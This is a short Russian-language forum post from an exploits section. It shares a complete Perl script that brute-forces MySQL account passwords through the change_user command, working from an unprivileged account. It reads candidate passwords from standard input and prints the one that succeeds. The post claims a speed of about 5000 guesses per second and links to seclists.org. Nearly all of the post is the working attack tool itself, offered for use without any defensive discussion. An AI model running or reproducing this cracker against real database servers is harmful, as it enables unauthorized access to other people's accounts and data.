MySQL Local/Remote FAST Account Password Cracking

Тема в разделе "Exploits |:| Vulnerabilities", создана пользователем Mei, 4 дек 2012.

  1. Mei
    Mei Guest
    Эксплоит для быстрого перебора паролей (локально и удаленно) MySQL из-под непривилегированного пользователя со скоростью около 5000 паролей в секунду. Основывается на функции change_user

    Описание:
    Perl-скрипт:
    Код:
    use Net::MySQL;
    
    $|=1;
    
    my $mysql = Net::MySQL->new(
     hostname => '192.168.2.3',
     database => 'test',
     user     => "user",
     password => "secret",
     debug => 0,
    );
    
    $crackuser = "crackme";
    
    while(<stdin>) {
    chomp;
    $currentpass = $_;
    
    $vv = join "\0",
                    $crackuser,
                    "\x14".
                    Net::MySQL::Password->scramble(
                            $currentpass, $mysql->{salt}, $mysql->{client_capabilities}
                    ) . "\0";
    if ($mysql->_execute_command("\x11", $vv) ne undef) {
            print "[*] Cracked! --> $currentpass\n";
            exit;
    }
    }
    Пример сессии:
    Ссылка: seclists.org
     
    4 дек 2012
    2 пользователям это понравилось.
Загрузка...